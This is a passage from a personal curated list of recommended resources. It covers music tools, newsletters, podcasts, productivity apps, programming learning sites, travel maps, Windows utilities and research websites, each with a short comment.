[Weawow](https://weawow.com/) ← beautiful weather forecast **[⬆ Back to Contents](#contents)** ## 🎶 Music ### DAW - [Ableton](https://www.ableton.com/en/) - [FL Studio](https://www.image-line.com/flstudio/) ← my favourite choice with lots of online tutorials. Can be highly extended with multiple plugins ### learn - [academy.fm](https://academy.fm/) ← lots of online courses - [ADSR](https://www.adsrsounds.com/courses/) ← learn Serum, Reaktor, Massive, etc. - [Beatboxing for kids](https://beatboxingforkids.fun/) ← teach your kids beatboxing using everyday words - [Learn music with Ableton](https://learningmusic.ableton.com/index.html) ← interactively in your browser - [Learning Synths](https://learningsynths.ableton.com/get-started) - [Melodics](https://melodics.com/) ← interactive desktop software - [Pianu](https://pianu.com/) ← online interactive piano - [Playground Sessions](https://www.playgroundsessions.com/) ← my personal favorite app to learn piano - [Simply Piano](http://www.joytunes.com/simply-piano) ← mobile app that listens to the sound through a microphone - [Synthesia](https://www.synthesiagame.com/) ← game that can help you learn how to play the piano using falling notes ### listen - [Brain.fm](https://www.brain.fm/) ← music to improve focus - [defonic](https://defonic.com/) ← create immersive soundscape - [Endel](https://play.endel.io/) ← personalized soundscapes to help you focus, relax, and sleep. Backed by neuroscience - [Last.fm](http://www.last.fm/) ← track your scrobbles. Make sure to [follow me](https://www.last.fm/user/Pyxelr)! - [lofi.cafe](https://lofi.cafe/) ← online radio to focus and relax - [lofi generator](https://lofigenerator.com/) ← algorithmically generate royalty-free lofi hip-hop - lofi hip hop radio ← live YouTube transmission of background music for your studying sessions - [beats to relax/study to](https://www.youtube.com/watch?v=hHW1oY26kxQ) - [beats to sleep/chill to](https://www.youtube.com/watch?v=EcEMX-63PKY) - [Moodil](https://www.moodil.com/) ← nature sounds - [musicForProgramming](http://musicforprogramming.net/) ← series of mixes intended for listening while '+task+' to aid concentration - [myNoise](https://mynoise.net/) ← create beautiful noises to mask the noises you don’t want to hear - [Noises.online](https://noises.online/) ← premium masking sounds - [Poolsuite FM](https://poolsuite.net/) ← the chillest place online: a place where it's perpetually the summer of 1997 (probably my favourite radio) - [Radio Garden](http://radio.garden/) ← listen to thousands of radio stations from the world using a Google Earth based menu - [SoundCloud](https://soundcloud.com/) ← find lots of indie music and upload your own one. Make sure to [follow me](https://soundcloud.com/pyxelr)! - [Spotify](https://www.spotify.com/) ← stream music online ### sample packs - [ADSR](https://www.adsrsounds.com/) ← sample packs + music courses - [BBC Sound Effects](http://bbcsfx.acropolis.org.uk/) ← 16000 BBC Sound Effects in WAV format - [Cymatics.fm](https://cymatics.fm/pages/free-download-vault) ← 1000’s of free samples, presets, and more - [Loopmasters](https://www.loopmasters.com/) ← different types of samples: one shots, loops, construction kits (samples combined for one particular song) - [SoundPacks](https://soundpacks.com/) ← comprehensive source for free sample packs, drum kits, loop packs, and preset packs ### tools - [alda](https://alda.io/) ← text-based programming language for music composition - [Bongo Cat](https://bongo.cat/) ← hit the bongos like Bongo Cat! - [Chrome Music Lab](https://musiclab.chromeexperiments.com/) ← website that makes learning music more accessible through fun, hands-on experiments - [DeepJ](https://github.com/calclavia/DeepJ) ← AI to compose piano music in real-time - [drumbit](https://drumbit.app/) ← online drum machine - [Every Noise at Once](http://everynoise.com/engenremap.html) ← map of music styles (play each style with a single click) - [Jukeblocks](https://jukeblocks.io/) ← song structure generator, that generates the tracks, song sections and composition/arrangement of a song - [Ludotune](https://ludotune.com/) ← make music with 3D blocks - [Music Grid](https://music-grid.surge.sh/) ← turn on sound, tap on the grid - [Music Maker](https://www.sentient.ai/sentient-labs/ea/lstm-music/) ← with the use of AI - [noise.sh](https://noise.sh/) ← digital signal processing spreadsheet for sound design - [Roland50 Studio](https://roland50.studio/) ← online music creation platform by Yuri Suzuki and Roland - [SOUL](https://soul.dev/) ← IDE and language to make music - [Spleeter](https://github.com/deezer/spleeter) ← extract acapella from the song using AI ([demonstration video](https://youtu.be/tgnuOSLPwMI)) - [The Infinite Drum Machine](https://experiments.withgoogle.com/ai/drum-machine/view/) ← create beats using sounds from the everyday world **[⬆ Back to Contents](#contents)** ## 📧 Newsletters Try gathering all your favourite newsletters into [Newsletry](https://newsletry.com/) (Inoreader for newsletters). - [Awesome Newsletters](https://github.com/zudochkin/awesome-newsletters) ← curated list of awesome newsletters - [Bullets.news](https://bullets.news/) ← scientific papers summarized in few bullet points - [Dane i Analizy](https://blog.prokulski.science/) (🇵🇱) ← ML, AI, devops, data analysis, Python and R - [Data Elixir](https://dataelixir.com/) ← weekly dose of the top data science picks from around the web. Covering machine learning, data visualization, analytics, and strategy - [Data Science Weekly](https://www.datascienceweekly.org/) ← featuring curated news, articles and jobs related to Data Science. You can read the [archive](https://www.datascienceweekly.org/newsletters) at any time - [DEV Community](https://dev.to/settings/notifications) ← weekly newsletter of top 7 posts (activate in settings of your account) - [GitHub Trending Repos](https://github.com/vitalets/github-trending-repos) ← subscribe to weekly/daily sets of trending repositories from different languages - [Hacker Newsletter](https://hackernewsletter.com/) ← weekly newsletter of best posts from Hacker News - [Highbrow](https://gohighbrow.com/) ← choose a topic to learn and receive a daily message - [Inside](https://inside.com/) ← daily newsletters on different topics. For example, check out [Inside AI](https://inside.com/ai) - [James Clear](https://jamesclear.com/newsletter) ← apply better habits in your life (from the author of Atomic Habits) - [KubeWeekly](https://www.cncf.io/kubeweekly/) ← weekly newsletter for all things Kubernetes and beyond - [learnbyexample weekly](https://learnbyexample.gumroad.com/l/learnbyexample-weekly) ← CLI, Python, Regular Expressions, Vim, etc. - [Machine Learning Ops Roundup](https://mlopsroundup.substack.com/) ← bringing together the best articles, news and papers about MLOps - [Morning Cup of Coding](https://morningcupofcoding.com/) ← daily programming newsletter featuring long form technical articles of all fields of software engineering - [Papers with Code](https://paperswithcode.com/newsletter) ← stay informed on the latest trending ML papers with code, research developments, libraries, methods, and datasets - [Podcast Notes](https://podcastnotes.org/) ← summary of podcasts in few bullet points - [Product Hunt Daily](https://www.producthunt.com/newsletter) ← a daily digest of the best of Product Hunt, created by your friends - [The Batch](https://read.deeplearning.ai/the-batch/) ← stay updated with weekly AI News and Insights from DeepLearning.AI - [The Data Science Roundup](http://roundup.fishtownanalytics.com/) ← internet's most useful data science articles - [The Overflow](https://stackoverflow.blog/newsletter/) ← newsletter by developers, for developers - [unknowNews](https://unknow.news/) (🇵🇱) ← weekly newsletter. Check its [archive](https://news.mrugalski.pl/) or [search engine](https://www.uw7.org/szukaj/) for the past sendings - [Unreadit/Tech](https://unreadit.com/n/tech/) ← Reddit content on tech **[⬆ Back to Contents](#contents)** ## 🎧 Podcasts I recommend listening to all podcasts through [Pocket Casts web/mobile app](https://www.pocketcasts.com/). ### business - [Akademia.pl](https://anchor.fm/akademia) (🇵🇱) ← podcast for new entrepreneurs - [Life Hacking Podcast](https://www.spreaker.com/show/life-hacking-podcast) (🇵🇱) ← develop your mind - [MiroBurn Show](https://anchor.fm/miroburn) (🇵🇱) ← main podcast by MiroBurn - [Przygody Przedsiębiorców](https://soundcloud.com/przygodyprzedsiebiorcow) (🇵🇱) ← interviews with entrepreneurs - [Startup my Way](https://startupmyway.com/) (🇵🇱) ← SaaS, startups, tech, future - [Ted Talks Business](https://www.ted.com/talks?topics%5B%5D=business) - [Więcej niż oszczędzanie pieniędzy](https://jakoszczedzacpieniadze.pl/podcast) (🇵🇱) ← how to spend money the right way ### cybersecurity - [Breaking Badness](https://www.domaintools.com/resources/podcasts) ← where timely and relevant security news meets ninja jokes and sit down comedy - [Cyber Security Headlines](https://cisoseries.com/category/podcast/cyber-security-headlines/) ← six-minute news podcast available every weekday - [Daily Information Security Podcast ("StormCast")](https://isc.sans.edu/podcast.html) ← daily 5-10 minute information security threat updates - [Darknet Diaries](https://darknetdiaries.com/) ← true stories from the dark side of the internet - [Digital Forensic Survival Podcast](https://digitalforensicsurvivalpodcast.com/) ← computer forensic analysis, techniques, methodology, tool reviews and more - [Kacper Szurek](https://security.szurek.pl/) (🇵🇱) ← overview of the latest security news - [Malicious Life](https://malicious.life/) ← history of cybersecurity, with comments and reflections by real hackers - [Na Podsłuchu - Niebezpiecznik.pl](https://www.spreaker.com/show/na-podsluchu-niebezpiecznik-pl) (🇵🇱) ← discussions of different cybersecurity topics - [The Privacy, Security, and OSINT Show](https://inteltechniques.com/podcast.html) ← weekly podcast presents ideas to help you become digitally invisible, stay secure from cyber threats, and make you a better online investigator - [The Social-Engineer Podcast](http://www.social-engineer.org/category/podcast/) ← podcast on social engineering ### data science - [Biznes Myśli](https://www.spreaker.com/show/biznes-mysli) (🇵🇱) ← AI podcast by Vladimir - [DataEvangelists](https://www.spreaker.com/show/dataevangelists) (🇵🇱) ← 1st Polish podcast on data science - [Data Framed](https://www.datacamp.com/community/podcast) ← from DataCamp creators - [Lex Fridman Podcast](https://lexfridman.com/podcast/) ← AI talks with top engineers - [Practical AI](https://changelog.com/practicalai) ← making artificial intelligence practical, productive, and accessible to everyone - [Python Bytes](https://pythonbytes.fm/) ← weekly podcast on Python - [Talk Python To Me](https://talkpython.fm/) ← podcast on Python and related technologies - [The Numberphile podcast](https://www.numberphile.com/podcast/) ← fall in love with numbers - [Ubuntu AI](https://podcastsbycanonical.buzzsprout.com/share) ← about the impact of artificial intelligence, machine learning and data science ### devops/mlops - [DevOps and Docker Talk](https://podcast.bretfisher.com/) ← interviews and audience Q&A from Bret Fisher's YouTube Live show and other chats with friends in the world of cloud native and container DevOps - [Kubernetes Notes](https://kubernetes-notes.captivate.fm/) ← based on Kubernetes Documentation - [Kubernetes Podcast from Google](https://kubernetespodcast.com/) ← weekly news and interview show with insight from the Kubernetes community - [MLOps.community](https://anchor.fm/mlops) ← weekly talks and fireside chats about everything that has to do with the new space emerging around DevOps for Machine Learning aka MLOps aka Machine Learning Operations - [MLOps Live](https://podcasts.bcast.fm/mlops-live) ← podcast by Neptune.ai - [Patoarchitekci](https://patoarchitekci.io/) (🇵🇱) ← about the modern architecture in IT - [Więcej Niż Konteneryzacja](https://szkoladockera.pl/category/podcast/) (🇵🇱) ← everything about containers by Damian Naprawa ### general/science - [60-Second Science](https://www.scientificamerican.com/podcast/60-second-science/) ← 60-second podcasts to explain scientific topics - [Dan Carlin's Hardcore History](https://www.dancarlin.com/) ← one of the most popular podcasts on history - [Duolingo podcast](https://podcast.duolingo.com/) ← learn languages with Duolingo - [People Guy w IT](https://www.youtube.com/@MarekDrob/) (🇵🇱) ← technology leadership topics - [Podcast Notes](https://podcastnotes.org/) ← best ideas and recommendations from the top podcasts - [Podcast Pasja Informatyki](https://podcast.pasja-informatyki.pl/) (🇵🇱) ← philosophy + IT - [Przemek Górczyk Podcast](https://www.youtube.com/@przemekgorczykpodcast/) (🇵🇱) ← interviews with various experts - [Simplify](https://www.blinkist.com/simplify) ← for anybody who’s taken a close look at their habits, their happiness, their relationships, or their health - [Ted Talks Daily](https://www.ted.com/talks) ← use your podcast app to find more categorised TED talks - [The 3b1b podcast](https://podcasts.google.com/feed/aHR0cHM6Ly9hbmNob3IuZm0vcy82MzZiNDgyMC9wb2RjYXN0L3Jzcw==) ← interviews hosted by Grant Sanderson, the creator of 3blue1brown - [The Anthropocene Reviewed](https://www.wnycstudios.org/podcasts/anthropocene-reviewed) ← reviews of facets of the human-centred planet - [The Joe Rogan Experience](https://www.joerogan.com/) ← famous podcast of Comedian Joe Rogan - [The Stephen Wolfram Podcast](https://soundcloud.com/stephenwolfram/) ← from the creator of Mathematica, Wolfram|Alpha and the Wolfram Language ### health - [Ben Greenfield Fitness](https://bengreenfieldfitness.com/) ← fitness advice - [Bulletproof Radio](https://blog.daveasprey.com/category/podcasts/) ← biohacker podcast by Dave Asprey - [Huberman Lab](https://hubermanlab.libsyn.com/) ← analysis of Neuroscience: how our brain and its connections with the organs of our body controls our perceptions, our behaviors, and our health - [TedTalks Health](https://www.ted.com/talks?topics%5B%5D=health) ### programming - [Andrzej on Software](https://www.spreaker.com/show/andrzej-krzywdas-show) ← software, including but not limited to Ruby, JS, OOP, DDD, CQRS, AI, business, sales, marketing - [DevelopersHangout](http://www.developershangout.io/) ← discussions of topics about coding and all that comes with it - [Developer Tea](https://spec.fm/podcasts/developer-tea) ← short podcast for developers - [Devsession](https://devsession.pl/) (🇵🇱) ← from programmer for programmers - [DevTalk](https://devtalk.pl/) (🇵🇱) ← podcast for programmers - [Retrospektywa](https://www.retrospektywa.com/) (🇵🇱) ← talks about IT projects - [The Real Python Podcast](https://realpython.com/podcasts/rpp/) ← interviews, coding tips, and conversation with guests from the Python community - [The Stack Overflow Podcast](https://stackoverflow.blog/podcast/) ← weekly conversation about working in software development **[⬆ Back to Contents](#contents)** ## ⏲ Productivity - [ActivityWatch](https://github.com/ActivityWatch/activitywatch) ← open-source time tracker (alternative to RescueTime) - [Box Breathing Exercise](https://breathe.vividwell.com/) ← take a break, breathe and calm down - [DeepL](https://www.deepl.com/translator) ← AI based translator (imho, better than Google Translator) - [Effective Engineer Notes](https://gist.github.com/rondy/af1dee1d28c02e9a225ae55da2674a6f) ← quick read on how to be effective and get things done - [Focusmate](https://www.focusmate.com/) ← let others watch you while you work - [Focus Sounds](https://github.com/pyxelr/recommendations-for-engineers#listen) ← navigate to the ["Music" section](https://github.com/pyxelr/recommendations-for-engineers#listen) of this list - [Inoreader](https://inoreader.com/) ← web-based content and RSS feed reader - [Intention](https://www.getintention.com/) ← Chrome extension to stop visiting distractive websites - [Leave Me Alone](https://leavemealone.app/) ← see all of your subscription emails in one place and unsubscribe from them with a single click - [lofi.cafe](https://lofi.cafe/) ← online radio to focus and relax - [Make](https://www.make.com/en) ← automate various tasks (more advanced than [IFTT](https://ifttt.com/) and 2.5x cheaper than [Zapier](https://zapier.com/)) - Monochrome mode (grayscale mode) activation on your mobile device ← attract yourself less to the colourless screen - [Obsidian](https://obsidian.md/) ← my favourite powerful knowledge base (note-taking tool) that works on top of a local folder of plain text Markdown files - [OneNote Desktop](https://www.onenote.com/download) ← note-taking tool from Microsoft (desktop version is much more feature-rich over the UWP app) - [Office OneNote Gem Add-Ins](https://www.onenotegem.com/) ← lots of plugins for different versions of OneNote - [Onetastic](https://getonetastic.com/) ← set of extensions for OneNote - [Productivity Methods](https://blog.todoist.com/2015/11/30/ultimate-guide-personal-productivity-methods/) ← large list by Todoist - [Productivity Stack](https://hive.com/the-productivity-stack/) ← list of productivity tools - [Quirk](https://quirk.fyi/) ← app to apply Cognitive Behavioral Therapy (CBT). The website also explains what is CBT - [Raindrop.io](https://raindrop.io/) ← bookmark manager (Pocket like app) - [RemNote](https://www.remnote.io/homepage) ← note-taking app that will convert your notes to flashcards with the use of specific syntax. Here you can check its [live demo](https://www.remnote.io/documentation/cJSBN4bczFCPMwBx7) - [Roam](https://roamresearch.com/) ← note-taking tool as powerful as a graph database, applying the Zettelkasten method (alternative to Obsidian) - [Todoist](https://todoist.com/r/pyxelr_kjtwbq) ← my daily to-do app (using this link you will get 2 months of premium for free!). If you don't know how to start, [check out my Todoist setup](https://pawelcislo.com/2018/11/09/aim-for-your-goals-the-right-way/#ftoc-heading-3) and inspire yourself! - [Toggl](https://toggl.com/) ← the most integrated time tracker **[⬆ Back to Contents](#contents)** ## 👨‍💻 Programming ### coding challenges - [Binary Search](https://binarysearch.io/) ← create a room, invite your friends, and race to finish the problems - [CheckiO](https://checkio.org/) ← learn Python or JavaScript through the online game - [Codecademy](https://www.codecademy.com/) ← one of the biggest online coding platforms - [CodeCombat](https://codecombat.com/) ← coding games to learn Python and JavaScript - [CodeGym](https://codegym.cc/) ← online Java programming course that is 80% based on practice - [CodeSignal](https://codesignal.com/) ← the most popular website of this kind - [Codewars](https://www.codewars.com/) ← improve your skills by training with others on real code challenges - [CodinGame](https://www.codingame.com/training) ← learn programming through online sets of puzzles - [Edabit](https://edabit.com/) ← simple, new website in the market - [exercism](https://exercism.io/) ← 100% free service, where you submit solutions through your terminal - [HackerRank](https://www.hackerrank.com/) ← my personal choice. I've started with included 30-days coding challenge and can totally recommend it - [JetBrains Academy](https://www.jetbrains.com/academy/) ← dive into Java, Python, and other programming languages in a project-based learning environment that is integrated with JetBrains IDEs - [LeetCode](https://leetcode.com/) ← more advanced website, where you will mostly find problems asked by the world's largest tech companies. I recommend watching [Kevin Naughton Jr.](https://www.youtube.com/channel/UCKvwPt6BifPP54yzH99ff1g) who goes through many problems from there - [Project Lovelace](https://projectlovelace.net/) ← bunch of free scientific programming problems. Each problem teaches some bit of science, like how to simulate a guitar, splice DNA, or predict the weather - [StrataScratch](https://www.stratascratch.com/) ← over 1000 data science exercises taken from real companies to practice SQL and Python ### devops/mlops - [Docker Desktop](https://www.docker.com/products/docker-desktop/) ← application for building and sharing containerized application - [Postman](https://www.postman.com/) ← popular API client that makes it easy for developers to create, share, test and document APIs ### IDE - [Anaconda](https://www.anaconda.com/distribution/) ← most popular Python/R Data Science platform, which lets you install and manage all of the following tools: - [Jupyter Notebook](https://jupyter.org/) ← good choice for the beginning and the reason of maintaining a well-documented code - [Spyder](https://www.spyder-ide.org/) ← Python IDE - [RStudio](https://rstudio.com/) ← R IDE - [Google Colab](https://colab.research.google.com/) ← alternative to Jupyter Notebook. Run your code entirely in the browser and improve the model learning time by leveraging Google's GPU/TPU - [PyCharm](https://www.jetbrains.com/pycharm/) ← more robust Python IDE - [Sublime Text](https://www.sublimetext.com/) ← the most optimised text editor with a package control - [Visual Studio Code](https://code.visualstudio.com/) ← highly extensible IDE from Microsoft (explained thoroughly in [My VS Code Playground](https://pawelcislo.com/2021/11/14/my-vs-code-playground/) blog post) ### online tools #### algorithm visualizer - [Algorithm Visualiser](https://algorithm-visualizer.org/) ← interactive online platform to visualise algorithms from code - [Pandas Data Tutor](https://pandastutor.com/) ← write Python pandas code in your browser and see how it transforms your data step-by-step - [Python Tutor](https://pythontutor.com/) ← visualise Python algorithms, step by step - [Tidy Data Tutor](https://tidydatatutor.com/) ← write R and Tidyverse code in your browser and see how your data frame changes at each step #### devops/mlops - [contains.dev](https://contains.dev/) ← explore Docker image files, layers and dependencies - [curlconverter](https://github.com/curlconverter/curlconverter) ← generate code from cURL commands - [Hoppscotch](https://hoppscotch.io/) ← open-source API dev ecosystem #### online IDE - [Coding Ground](https://www.tutorialspoint.com/codingground.htm) ← set of online IDE and compilers - [OnlineGDB](https://www.onlinegdb.com/) ← online compiler and debugger - [Repl.it](https://replit.com/) ← collaborative, in-browser IDE to code in 50+ languages - [vscode.dev](https://vscode.dev/) ← VS Code for the web #### SQL - [MySQL Syntax Check](https://www.piliapp.com/mysql-syntax-check/) ← online SQL Query Checker - [SQLite Online](https://sqliteonline.com/) ← SQL Online IDE - [SQLite Playground](https://sqlime.org/) ← run SQL query to see the results #### web dev - [Animatize](https://animatize.com/) ← Drag a character with your mouse to create an animation - [Can I use ...](https://caniuse.com/) ← up-to-date browser support tables for support of front-end web technologies - [CSS Stats](https://cssstats.com/) ← analytics and visualizations for your stylesheets - [Dead link checker](https://www.deadlinkchecker.com/) ← broken link checker - [ExtendsClass](https://extendsclass.com/) ← toolbox for web designers and webmasters - [favicon.cc](https://www.favicon.cc/) ← favicon.ico generator - [GTmetrix](https://gtmetrix.com/) ← website performance checker - [Layoutit Grid](https://grid.layoutit.com/) ← quickly draw down web pages layouts with our clean editor, and get HTML and CSS code - [Nu HTML checker](https://validator.w3.org/nu/#textarea) ← validate HTML - [Tiny Helpers](https://tiny-helpers.dev/) ← collection of free single-purpose online tools for web developers - [Transform tools](https://transform.tools/) ← polyglot web converter #### extra - [Airtable](https://airtable.com/) ← partly spreadsheet, partly database. Can replace WordPress for non-technical users, who can also manage multiple domains using this tool - [Bubble](https://bubble.is/) ← visual programming (no coding required) - [Coda](https://coda.io/) ← build docs as powerful as an app (no coding recuired) - [DevDocs](https://devdocs.io/) ← API documentation browser - [free-for.dev](https://free-for.dev/) ← list of software (SaaS, PaaS, IaaS, etc.) and other offerings that have free tiers for developers - [json.pizza](https://json.pizza/) ← beautify your JSON code - [regex101](https://regex101.com/) ← online regex tester and debugger - [StackEdit](https://stackedit.io/) ← visual Markdown editor ### websites to study from - [30 seconds of code](https://www.30secondsofcode.org/) ← collection of useful snippets in multiple languages, which you can understand in 30 seconds or less - [A to Z Resources for Students](https://github.com/dipakkr/A-to-Z-Resources-for-Students) ← find even more resources to learn software engineering - [Build your own X](https://github.com/danistefanovic/build-your-own-x) ← resources to start developing your first website, database; you name it - [Code Club](https://codeclubprojects.org/en-GB/python/) ← find ideas for your Python projects - [Coding Interview University](https://github.com/jwasham/coding-interview-university) ← complete computer science study plan to become a software engineer - [Data Structure Visualisations](https://www.cs.usfca.edu/~galles/visualization/Algorithms.html) ← interactive visualisation for most of data structures - [DevTube](https://dev.tube/) ← developer videos in one place. You can try replacing YouTube with DevTube - [Every Programmer Should Know](https://github.com/mtdvio/every-programmer-should-know) ← collection of (mostly) technical things every software developer should know - [freeCodeCamp](https://www.freecodecamp.org/) ← learn to code from open-source community for free - [Games of Coding](https://github.com/michelpereira/awesome-gamesofcoding) ← curated list of games that can teach you how to learn a programming language - [Goalkicker](https://goalkicker.com/) ← free programming books on various technologies - [interviewing.io](https://interviewing.io/) ← free anonymous interview practice. Before practising you can [watch technical mock interviews](https://interviewing.io/recordings) with engineers from big companies - [JavaScript Algorithms and Data Structures](https://github.com/trekhleb/javascript-algorithms) ← algorithms and data structures implemented in JavaScript with explanations and links to further readings. Don't prevent yourself from taking a look, even if you're not a JS developer - [Katacoda](https://www.katacoda.com/) ← learn new technologies using real environments right in your browser - [Learn X by doing Y](https://aquadzn.github.io/learn-x-by-doing-y/) ← list of projects to learn by doing - [Learn X in Y Minutes](https://learnxinyminutes.com/) ← take a whirlwind tour of your next favourite language. Community-driven! - [My Pinterest Page about Software Development](https://pinterest.com/pyxelrr/software-development/) ← here I store the most interesting infographics - [O'Reilly learning](https://www.oreilly.com/online-learning/) ← learn artificial intelligence, operations, data, UX design, finance, leadership, and more - [Packt Hub Tutorials](https://hub.packtpub.com/category/tutorials/) ← free web dev & programming tutorials - [Python Awesome](https://pythonawesome.com/) ← nice collection of often useful awesome Python frameworks, libraries and software - [The Best Python Lighting Talks](https://pythonlinks.info/python) ← videos to watch about Python - [Real Python](https://realpython.com/) ← Python tutorials, quizzes, courses and more - [Refactoring](https://refactoring.guru/refactoring) ← pleasant guide to clean your messy code - [Tutorialspoint](https://www.tutorialspoint.com/) ← programmer's ultimate Wikipedia - [W3Schools](https://www.w3schools.com/) ← well documented online tutorials **[⬆ Back to Contents](#contents)** ## 🛫 Travel - [Ancient Earth Globe](https://dinosaurpictures.org/ancient-earth#120) ← what did Earth look like X million years ago? - [Champion Traveler](https://championtraveler.com/best-time-to-travel/) ← find the best time to travel based on the weather - [Cell Tower Distribution](https://alpercinar.com/open-cell-id/) ← world's largest open database of cell towers - [city roads](https://anvaka.github.io/city-roads/) ← render every single road within a city - [Country Comparison](https://www.hofstede-insights.com/country-comparison/) ← across 6 different business factors, by Hofstede Insights - [Dollar Street](https://www.gapminder.org/dollar-street) ← photos as data to kill country stereotypes - [Expatistan](https://www.expatistan.com/cost-of-living) ← compare cost of living between cities - [If It Were My Home](http://www.ifitweremyhome.com/compare/listing/PL) ← compare countries - [My Life Elsewhere](http://www.mylifeelsewhere.com/) ← quality of life comparison - [Nomad List](https://nomadlist.com/) ← filter the best cities to live - [Numbeo](https://www.numbeo.com/cost-of-living/comparison.jsp) ← cost of living comparison - [See a satellite tonight](https://james.darpinian.com/satellites/) ← search for a satellite on your sky - [ShadeMap](https://shademap.app/) ← simulate sun shadows for any time and place on Earth - [Shadow Calculator](http://shadowcalculator.eu) ← sun shadow on Google Maps - [Submarine Cables](https://globe.gl/example/submarine-cables/) ← map of submarine cables - [Surname Maps in Europe](https://www.surnamemap.eu/) ← surname maps generator of main european countries - [The Best Time to Travel Anywhere](https://championtraveler.com/best-time-to-travel/) ← comparison of weather, number of tourists etc. - [The True Size Of ...](https://thetruesize.com/) ← select a country, drag it around the world map to compare its size - [Weather Spark](https://weatherspark.com/) ← climate reports with the weather by month, day, even hour - [What to Eat in](https://what.toeat.in/) ← list of things to eat in selected countries - [Wikivoyage](https://en.wikivoyage.org/wiki/Main_Page) ← worldwide travel guide - [World's Air Pollution](https://waqi.info/) ← real-time air quality index **[⬆ Back to Contents](#contents)** ## 🖥 Windows - [7-Zip](https://www.7-zip.org/) ← file archiver with a high compression ratio - [Action!](https://mirillis.com/en/products/action.html) ← screen recorder - [AIMP](https://www.aimp.ru/?do=download&os=windows) ← music player - [AquaSnap](https://www.nurgo-software.com/products/aquasnap) ← tiling window manager - [Audacity](https://www.audacityteam.org/) ← simple audio editor - [AutoHotkey](https://www.autohotkey.com/) ← ultimate automation scripting language for Windows ([here](https://github.com/pyxelr/my-autohotkey-scripts) is a collection of my scripts) - [Calibre](https://calibre-ebook.com/) ← e-book manager - [Chocolatey](https://chocolatey.org/) ← package manager - [clink](https://github.com/chrisant996/clink) ← Bash's powerful command line editing in cmd.exe - [Deskreen](https://deskreen.com/) ← turn any device into a secondary screen for your computer - [DevToys](https://devtoys.app/) ← Swiss Army knife for developers - [Directory Opus](https://www.gpsoft.com.au/) ← ultimate file manager (worth paying for) - [Ditto](https://ditto-cp.sourceforge.io/) ← clipboard manager - [Everything](https://www.voidtools.com/downloads/) ← search local files instantly - [EverythingToolbar](https://github.com/stnkl/EverythingToolbar) ← Everything integration for the Windows taskbar - [Ferdium](https://ferdium.org/) ← all the social apps in one place - [FileZilla](https://filezilla-project.org/) ← free and open-source FTP client/server - [f.lux](https://justgetflux.com/) ← reduce the amount of blue light at night (you can also install [the preferred UWP app](https://www.microsoft.com/en-us/p/flux/9n9kdphv91jt)) - [Frink](https://frinklang.org/) ← practical calculating tool and programming language designed to make physical calculations simple - [GitKraken](https://www.gitkraken.com/) ← cross-platform GUI Git client - [gsudo](https://github.com/gerardog/gsudo) ← sudo for Windows - [JDownloader](http://jdownloader.org/home/index?s=lng_en) ← open-source download management tool - [KeePassXC](https://keepassxc.org/) ← cross-platform password manager. Otherwise, consider [1Password](https://1password.com/) as the most secure online manager - [MobaXterm](https://mobaxterm.mobatek.net/) ← enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more - [Mp3tag](https://www.mp3tag.de/en/) ← mp3 tag editor - [Ninite](https://ninite.com/) ← install and update all your programs at once - [NirSoft - freeware utilities](https://www.nirsoft.net/utils/index.html) ← freeware tools and system utilities - [Oh My Posh](https://ohmyposh.dev/) ← prompt theme engine for any shell. Alternatively, use [Starship](https://github.com/starship/starship) - [Patch My PC](https://patchmypc.com/home-updater) ← free tool for detecting and automatically updating software (more automated than [SUMo](https://www.kcsoftwares.com/?sumo), but less powerful) - [PDF-XChange Editor](https://www.tracker-software.com/product/pdf-xchange-editor) ← most feature-rich PDF viewer/editor - [PortableApps.com](https://portableapps.com/) ← full-featured portable software system - [Potplayer](https://potplayer.daum.net/) ← video player - [PowerToys](https://github.com/microsoft/PowerToys) ← Windows system utilities to maximize productivity - [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)← SSH and telnet client - [qBittorrent](https://www.qbittorrent.org/) ← open-source torrent manager - [scoop](https://scoop.sh/) ← command-line installer for Windows - [ShareX](https://getsharex.com/) ← most feature-rich screen capture tool - [simplewall](https://github.com/henrypp/simplewall) ← configure Windows Filtering Platform (WFP) which can configure network activity on your computer - [SUMo](https://www.kcsoftwares.com/?sumo) ← tool for detecting software updates (less automated than [Patch My PC](https://patchmypc.com/home-updater), but more powerful) - [Sysinternals Utilities Index](https://docs.microsoft.com/en-us/sysinternals/downloads/) ← utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment - [TaskbarX](https://chrisandriessen.nl/taskbarx) ← center Windows taskbar icons with a variety of animations and options - [Windows Terminal](https://github.com/microsoft/terminal) ← modern terminal application (you can find my settings [here](https://github.com/pyxelr/my-terminal)) - [WinMerge](https://winmerge.org/) ← open-source diff checker (required e.g. by Ditto) - [WinSCP](https://winscp.net/eng/index.php) ← popular SFTP client and FTP client for Microsoft Windows - [WSLg](https://github.com/microsoft/wslg) ← open GUI software through WSL - [XnView MP](https://www.xnview.com/en/xnviewmp/) ← powerful photo viewer, image management, image resizer **[⬆ Back to Contents](#contents)** ## ✍ Writing_Research - [After the Deadline](https://www.polishmywriting.com/) ← free spell checker - [Diffchecker](https://www.diffchecker.com/) ← compare differences in text, images, PDFs and more - [Grammarly](https://www.grammarly.com/) ← most popular English proofreader with AI optimisation - [LanguageTool Plus](https://languagetoolplus.com/) ← proofreading extension - [Parts of speech](https://parts-of-speech.info/) ← categorise words based on similar grammatical properties (noun, verb, adjective, etc.) - [Power Thesaurus](https://www.powerthesaurus.org/) ← synonym finder - [Readable](https://www.webfx.com/tools/read-able/) ← perform the ultimate readability test (base on Flesch Kincaid Reading Ease, SMOG Index and more...) - [Word Frequency Counter](http://www.writewords.org.uk/word_count.asp) ← paste in the text and find out if you're not overusing particular words - [ZoteroBib](https://zbib.org/) ← web bibliography manager. Also, check the [cross-platform version](https://www.zotero.org/) ### LaTeX - [Awesome LaTeX](https://github.com/egeerardyn/awesome-LaTeX) ← list of LaTeX resources - [Mathpix Snip](https://mathpix.com/) ← convert images to LaTeX by capturing your screen - [Overleaf](https://www.overleaf.com/) ← online LaTeX editor, recommended not only for the beginners ### research websites - [arXiv](https://arxiv.org/) ← open access to the scientific papers - [Arxiv Sanity Preserver](http://www.arxiv-sanity.com/) ← web interface that attempts to tame the overwhelming flood of papers on Arxiv - [DOAJ](https://doaj.org/) ← directory of open access journals - [Google Scholar](https://scholar.google.com/) ← web search engine that indexes the full text or metadata of scholarly literature - [JSTOR](https://www.jstor.org/) ← access to more than 12 million academic journal articles, books, and primary sources in 75 disciplines - [ResearchGate](https://www.researchgate.net/) ← European commercial social networking site for scientists and researchers to share papers, ask and answer questions, 